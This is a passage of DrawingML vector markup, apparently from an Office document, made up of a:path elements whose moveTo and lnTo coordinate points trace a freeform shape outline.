                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159889" y="1066799"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2170176" y="1041399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2116963" y="1041399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111629" y="1054099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2107184" y="1054099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101088" y="1066799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160397" y="1066799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2165731" y="1054099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170176" y="1041399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2174621" y="1028699"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2121281" y="1028699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116455" y="1041399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170557" y="1041399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2174621" y="1028699"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="270891" y="990599"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="196976" y="990599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202184" y="1003299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209169" y="1003299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214884" y="1015999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222504" y="1015999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228726" y="1028699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341375" y="1028699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270891" y="990599"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2182241" y="1015999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2128901" y="1015999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2124837" y="1028699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2179066" y="1028699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182241" y="1015999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2185289" y="1003299"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2132203" y="1003299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128520" y="1015999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182495" y="1015999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2185289" y="1003299"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2194687" y="939799"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2145538" y="939799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141093" y="965199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141347" y="965199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137029" y="990599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137410" y="990599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134743" y="1003299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2185670" y="1003299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2189861" y="977899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190242" y="977899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194687" y="939799"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="258825" y="977899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="184785" y="977899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197612" y="990599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272923" y="990599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258825" y="977899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="125222" y="825499"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127126" y="838199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="838199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85471" y="863599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87375" y="863599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183896" y="977899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249555" y="977899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="965199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239775" y="965199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233934" y="952499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220980" y="939799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221869" y="939799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125222" y="825499"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2196973" y="609600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2147443" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149856" y="838199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2145411" y="939799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194814" y="939799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199259" y="850899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199386" y="838199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2196973" y="609600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="113284" y="812799"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60451" y="812799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65913" y="825499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70739" y="838199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127126" y="838199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113284" y="812799"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="101854" y="787399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="48768" y="787399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51943" y="800099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56388" y="812799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="812799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109347" y="800099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105918" y="800099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101854" y="787399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="91059" y="749299"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40767" y="749299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42672" y="761999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45593" y="774699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48387" y="787399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102235" y="787399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98551" y="774699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96012" y="774699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93218" y="761999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93472" y="761999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91059" y="749299"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="55499" y="584200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6858" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28701" y="698499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28829" y="698499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40894" y="749299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89281" y="749299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77216" y="685799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55499" y="584200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2147443" y="609600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2147062" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147570" y="622299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147443" y="609600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2195703" y="596900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2145665" y="596900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2146681" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2196465" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2195703" y="596900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2193163" y="584200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2141982" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2143633" y="596900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194306" y="596900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2193163" y="584200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="50165" y="469900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="762" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6604" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55753" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50546" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49530" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49403" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50165" y="469900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2138426" y="571500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2136267" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2138807" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2138426" y="571500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2189353" y="571500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2138426" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2140585" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191131" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2189353" y="571500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2131187" y="558800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2127758" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132330" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131187" y="558800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2186686" y="558800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2131187" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137029" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2187067" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186686" y="558800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2123567" y="546100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2118995" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2124202" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123567" y="546100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2173859" y="533400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2109343" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115058" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123567" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128393" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181479" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2180717" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2173859" y="533400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2163191" y="520700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2092579" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2105406" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169287" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="520700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2046732" y="419100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1954784" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2016506" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093468" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157349" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151888" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2145538" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144776" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137664" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2124837" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123821" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046732" y="419100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="57023" y="431800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5715" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50038" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54610" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54356" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57023" y="431800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="63626" y="406400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12319" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9017" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5969" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56769" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60071" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63626" y="406400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1855724" y="279400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1761109" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827784" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827149" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1836674" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1836293" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1955165" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046605" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984883" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984502" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1865630" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855724" y="279400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="67691" y="393700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16510" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12573" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63373" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67691" y="393700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="82550" y="368300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26416" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16764" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77089" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76581" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82550" y="368300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="150114" y="279400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85471" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39624" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32766" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32258" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26924" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81407" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113792" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112522" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124841" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124206" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137160" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136525" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150114" y="279400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="242316" y="203200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="157988" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115062" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99949" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99187" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86233" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148590" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191516" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190119" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207518" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206629" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224663" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223774" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242316" y="203200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1546352" y="88900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1338834" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422908" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502791" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537843" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1547241" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562100" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727073" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726565" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761363" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855089" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788414" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788160" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753362" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752854" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587754" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1586357" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1577467" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1555877" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546352" y="88900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="297942" y="165100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215265" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196723" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176911" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159512" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241300" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259461" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279019" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278003" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297942" y="165100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="424180" y="127000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="276606" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256667" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255650" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236093" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235204" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216154" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297942" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296291" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424180" y="127000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="628904" y="76200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="406273" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278257" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422401" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473710" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472186" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628904" y="76200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1352677" y="38100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1321339" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324554" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324102" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319956" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309370" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1339850" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1516761" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436878" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436751" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352677" y="38100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="697992" y="63500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="459486" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408050" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627253" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697992" y="63500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1258062" y="63500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1211834" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253744" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309116" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258062" y="63500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1264666" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1244653" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240917" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240684" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243822" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249793" y="63500"/>
                  </a:lnTo>
